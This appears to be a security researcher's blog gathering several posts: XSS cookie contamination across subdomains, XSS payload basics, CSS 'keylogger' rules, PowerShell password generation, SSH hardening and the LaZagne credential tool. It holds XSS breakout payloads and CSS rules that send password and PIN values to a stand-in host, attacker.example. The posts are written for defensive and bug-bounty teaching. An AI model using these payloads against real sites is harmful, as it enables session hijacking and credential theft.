
Cross domain cookie contamination

TLDR: XSS attacks can be used to set cookies for subdomains that share the same parent domain. This increases the scope of XSS attacks.

In a cloud world, several applications are hosted under the same parent domain. An organization can have separate hostnames for:

  • a corporate landing page
  • webmail
  • internal resources
  • a web store

Since they all share the same parent domain, an XSS vulnerability could allow an attacker to set domain-wide cookies. Domain-wide cookies are inherited by all subdomains, so they can contaminate cookie values on other subdomains.

The “attack”

There are two main scenarios, both involving two hosts: one (say, blog.example.com) with an exploitable XSS vulnerability, and another (say, shop.example.com) that uses cookies for session management. An attacker exploits a victim using the XSS vulnerability, but instead of doing the obvious cookie stealing or DOM manipulation (on blog.example.com), he can set arbitrary cookies for the entire domain, including shop.example.com. He'd execute something like:
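A minimal sketch of such a payload, assuming an example.com parent domain and an illustrative cookie name (the helper just builds the cookie string; in the victim's browser the injected script would assign it to document.cookie):

```javascript
// Hypothetical XSS payload sketch: set a session cookie for the whole
// registrable domain, so that every subdomain inherits it.
function domainWideCookie(name, value, domain) {
  // "domain=.example.com" makes the cookie apply to all subdomains
  return `${name}=${value}; domain=${domain}; path=/`;
}

// In the victim's browser, the injected script would run something like:
// document.cookie = domainWideCookie("session", "attacker-chosen-id", ".example.com");
```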


He could successfully “log in” the victim into an arbitrary account, alter settings, or even overwrite CSRF tokens.


If a host such as shop.example.com already has a cookie set with the same name, the browser (Firefox under Ubuntu 18.04 at least; I’m still testing others) will present both cookies. I’m currently figuring out what different frameworks do when several cookies with the same name are presented.
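How a given server-side stack resolves the duplicate is framework-specific; as an illustration, a naive parser like the sketch below (names are made up) would keep the first occurrence it sees:

```javascript
// Naive Cookie-header parser: the first occurrence of a name wins.
function parseCookies(header) {
  const jar = {};
  for (const pair of header.split("; ")) {
    const [name, value] = pair.split("=");
    if (!(name in jar)) jar[name] = value; // later duplicates are ignored
  }
  return jar;
}

// With two cookies of the same name, this parser keeps the first one:
// parseCookies("session=victim; session=attacker").session // "victim"
```

Other parsers may keep the last occurrence instead, which is exactly why duplicate-name behavior is worth probing per framework.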

This may enable interesting attacks, especially for applications that are hosted on a “more critical” parent domain, or are “shared” across cloud providers.


Not a foolproof solution, but you probably want to move away from storing values in cookies that can dictate a particular state, unless the value can be validated (signature, …), or host applications of different “value” off different parent domains.

If you have a JavaScript-rich application, and you handle authentication (API calls, etc.) with tokens that you store in cookies, you may want to opt for localStorage or sessionStorage rather than HTTP cookies.
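As a sketch (the endpoint and storage key are made up), the token then travels in a header that a domain-wide cookie cannot influence:

```javascript
// Sketch: keep the API token out of cookies and send it explicitly.
function authHeader(token) {
  return { Authorization: `Bearer ${token}` };
}

// In the browser:
// sessionStorage.setItem("apiToken", token);  // after login
// fetch("/api/me", { headers: authHeader(sessionStorage.getItem("apiToken")) });
```

Script-readable storage has its own XSS trade-offs, of course, but unlike domain cookies it is scoped to a single origin and is not shared across subdomains.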

And of course, don’t host applications with XSS. 🙂


The revival of (cross site) script kiddies.

First off, a Happy 2019!

Being in charge of adjudicating Microsoft’s Cloud Bug Bounty, we see many “low hanging fruit” XSS bugs coming through. While we have tools that catch these bugs, sometimes they slip through the cracks. Also, since machines won’t find every.single.bug.ever, we pay out for interesting bugs, and bump up payouts for high quality reports. Sadly though, many of these bugs make us utter a “how come our tools didn’t catch this?”, rather than a “wow, that’s an interesting approach!”. Needless to say, the latter would get higher payouts.

XSS 101

I hope most of you know cross site scripting (XSS). If you can inject active content (JavaScript, 9 times out of 10) into a page that, preferably, others will see, you have cross site scripting. There may be other nuances to this, but that’s generally my approach. The best way of showing these is to perform an

alert(document.domain)

which will display the current context’s domain. Showing the current domain, rather than a “123”, “foo” or “pwnage!!1!” message, clearly shows which domain’s DOM you have access to. In the world of embedded iframes, that proves to be useful.


Most XSS payloads, and there are several lists out there, are designed to be injected into a page’s DOM. Since the application you’re targeting may be wrapping your input in existing markup, you may have to close a previous tag. The tainted data may be included as an HTML attribute, as part of a JS script block, or just as general HTML content. For these, a payload like:

  • " onmouseover="alert(123)
  • "; alert(123); var foo="
  • </textarea><script>alert(123);</script>

may have to come into play. Needless to say, that list is endless.


Being on the receiving side of bug bounty submissions, and having spent several evenings in HTTP access_log or W3SVC1 log files performing pattern analysis, I see significantly more breadth than depth. Meaning that many will try a vanilla <script>alert(123)</script> payload, rather than following how the data ends up in the DOM, missing out on bugs, and payouts.

So for that, I’d ask: if you find yourself mindlessly copy-pasting XSS payloads into each field, don’t treat the absence of an alert dialog box as a binary answer (“the site is not vulnerable”); maybe you just need to perform some taint analysis and try again.


Create random passwords with PowerShell

A task I find myself doing occasionally is generating a password or other symmetric secret. Of course, to avoid things like “Azure123!”, and even going beyond correct-horse-battery-staple mechanisms, I like to generate random strings and store these in a password vault, either online or local.

At work, I (have to) use PowerShell quite a bit, so I use the following line to come up with a 20-character random password containing digits and upper- and lowercase letters:

-join ((48..57)+(65..90)+(97..122) | Get-Random -count 20 | %{[char]$_ })

If you need to include special characters, I typically add (!, #, *, -, @ and ~) to the mix, since they’re unlikely to have a special meaning to an underlying system. Their corresponding ASCII values can be added simply:

-join ((33,35,42,45,64,126)+(48..57)+(65..90)+(97..122) | Get-Random -count 36 | %{[char]$_ })

CSS keyloggers, hype and/or impact

A few days ago, I stumbled across one of LiveOverflow’s videos, where he discusses a so-called “CSS keylogger” (GitHub), its impact and novelty.

While there’s nothing new about the attack (it was reported several years ago, yet it popped up again on YCombinator’s Hacker News), I guess that’s what triggered LiveOverflow to make the video.

This “attack”, where CSS is abused by altering an element’s background based on its content, allows CSS to be dubbed a keylogger. Although, as he rightfully notes in his video, keyloggers usually capture keystrokes system-wide. As a TLDR, the attack basically works like this:

input[type="password"][value="a"]{ background-image: url("https://attacker.example/a"); }
input[type="password"][value="b"]{ background-image: url("https://attacker.example/b"); }
input[type="password"][value="aa"]{ background-image: url("https://attacker.example/aa"); }
input[type="password"][value="ab"]{ background-image: url("https://attacker.example/ab"); }

The problem, as he points out too, is that you need a CSS file that’s several megabytes and potentially contains every password in the book (since the rules don’t get triggered per keystroke, only on the full value), which, when exploited with an HTML injection attack, may not be very feasible or realistic.

One thing would make this more feasible, though: if you rely on external hosts to host your CSS files, such as a CDN (or files referenced with an @import rule), you could have a malicious CDN that hosts a pseudo-keylogging CSS file. Also, while provisioning a file with all passwords may be difficult, any input with a limited key space may be a good target for this attack. PIN codes, or 2FA numeric challenge requests, come to mind.
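To illustrate why a small key space changes the economics, a sketch that generates one exfiltration rule for every 4-digit PIN (attacker.example is a placeholder collection endpoint):

```javascript
// Generate one CSS rule per possible 4-digit PIN (10,000 rules total).
function pinExfilCss(endpoint) {
  const rules = [];
  for (let pin = 0; pin < 10000; pin++) {
    const v = String(pin).padStart(4, "0"); // "0000" .. "9999"
    rules.push(
      `input[type="password"][value="${v}"]{background-image:url("${endpoint}/${v}")}`
    );
  }
  return rules.join("\n");
}
```

The whole file weighs in at well under a megabyte, unlike a dictionary of every password in the book.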

Since people are usually a bit wary of where they host their JavaScript files (XSS attacks, etc.), attitudes towards CSS are generally a bit more relaxed.

If you deal with sensitive user input, ensure you host your CSS files in a trusted environment. For defense in depth, you can include a Content Security Policy header that only allows CSS to be loaded from whitelisted sources.
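A sketch of such a header, assuming a placeholder trusted CDN hostname:

```
Content-Security-Policy: style-src 'self' https://trusted-cdn.example
```

With this policy in place, a browser will refuse to load stylesheets from any other origin, including a compromised or malicious CDN.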


Washington State

So, it’s been a while since I last updated this blog; a bad habit of mine. I moved a while ago to Washington State, to be closer to work. I’m still setting everything up, with all the usual issues that happen when moving countries, but yay! New places to visit, new people to meet, new things to do!


Nullcon 2017

A few months ago, I was asked to speak at Nullcon 2017, which concluded a few weeks ago. It was a very well set-up conference, and it attracts a lot of the security community in the Indian subcontinent. A pleasure to speak at, and I’d be happy to do it again in Goa in 2018.

I presented how to sign up for Microsoft Azure in order to find security vulnerabilities for our Azure Bug Bounty program. We presented together with Facebook, Google, Bugcrowd and HackerOne to entice the community to participate in bug bounties.

Anyway, a quick thank you to the organizers, and hope to see you all in 2018 in beautiful, sunny Goa!


The lost art of penetration testing

Just a little rant.
Often, a security consultant is asked to perform a VA/PT (the difference is a whole topic for another day) for a customer within a number of man-days. Obviously, as with most service-based deliverables, one quantifies work in the time spent on it: hours, or, more often, days. But this creates a false sense of security. Time spent is not the right yardstick.

When dealing with a business deadline (i.e., the app needs to be released today, the new portal needs to be pushed next week, …), we often compromise on security and treat the security audit, or VA/PT if you like, as a checkbox:

oh, no critical and/or highs? we’re good to go. We’ll fix the rest later

And that is bad for two reasons:

  • The rest is never fixed
  • You’re ‘protected’ only against whoever spends that amount of time on it

This is, in my opinion, why Bug Bounty programs are so effective, and essential for any organization. Yes, you’re tongue-in-cheek giving attackers the green light to assess your security, but you equally get an assessment 24/7, not limited in time.

After joining Microsoft, I’ve been very involved in some of the Bug Bounty programs MSFT offers, and most of the “juicy bugs” (the real eye openers) are the result of days, weeks and sometimes even months of testing, failing, and retesting.

If you have internal (technical) information security staff, embrace the notion of continuous testing. Yes, some properties need a checkbox assessment before going live, but don’t let anyone stop there. If you don’t have the internal muscle power, embrace a bug bounty program. There are several clever minds out there who will uncover sometimes hard-to-find bugs, because they like doing so.


Post exploitation tools: Lazagne

Often, after a compromise of a machine, red teams / adversaries search for certificates or credentials to hop to other machines, which is often referred to as “lateral movement”. When doing so, many use Mimikatz, a tool that extracts credentials, PIN codes and Kerberos tickets from memory. There are countless blog articles about how to detect it, hide it from AV, etc.

But another nifty tool that many don’t know about is LaZagne. It searches for credentials in files and the registry: not just your Windows credentials, but also things you save in your browsers, mail clients, FTP clients, keyrings, etc.


Quick SSH security tips

Just a quick post about a page I stumbled across that I merely want to keep in my bookmarks. I was talking to some people about securing public-facing SSH servers; and while we have the obvious:

  • Only allow SSH protocol 2
  • Disable root logins
  • Use keypairs instead of passwords
  • Implement fail2ban
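The first three bullets map roughly onto sshd_config directives like these (fail2ban is configured separately; the Protocol directive only matters on older OpenSSH releases, as recent ones speak protocol 2 only):

```
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
```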

When researching how to make internet-exposed SSH boxes more secure, I’ve recently been implementing MFA (Multi Factor Authentication). MFA usually combines something you know (password, PIN, …) with something you have (smartcard, keyfob, mobile, mobile app, …). In SSH, this can be achieved with the following sshd_config snippet; it forces you to authenticate with your keypair AND your password:

Match User johndoe
    AuthenticationMethods publickey,keyboard-interactive

This, and more tips, were found on that page, so check it out.


Testing phishing scenarios

When I joined my company, I was asked to perform a few social engineering assessments for private and government customers alike. Previously, the assessments being done mostly measured how many people would click a link in a spoofed e-mail, regardless of the damage. But I wanted to step things up a bit, as I believe that phishing is an often underrated risk, and one that seems to be quite effective.

Although “social engineering” is much more than phishing, we are generally asked to keep it to phishing attacks alone. We use the following scenarios to quantify the risk: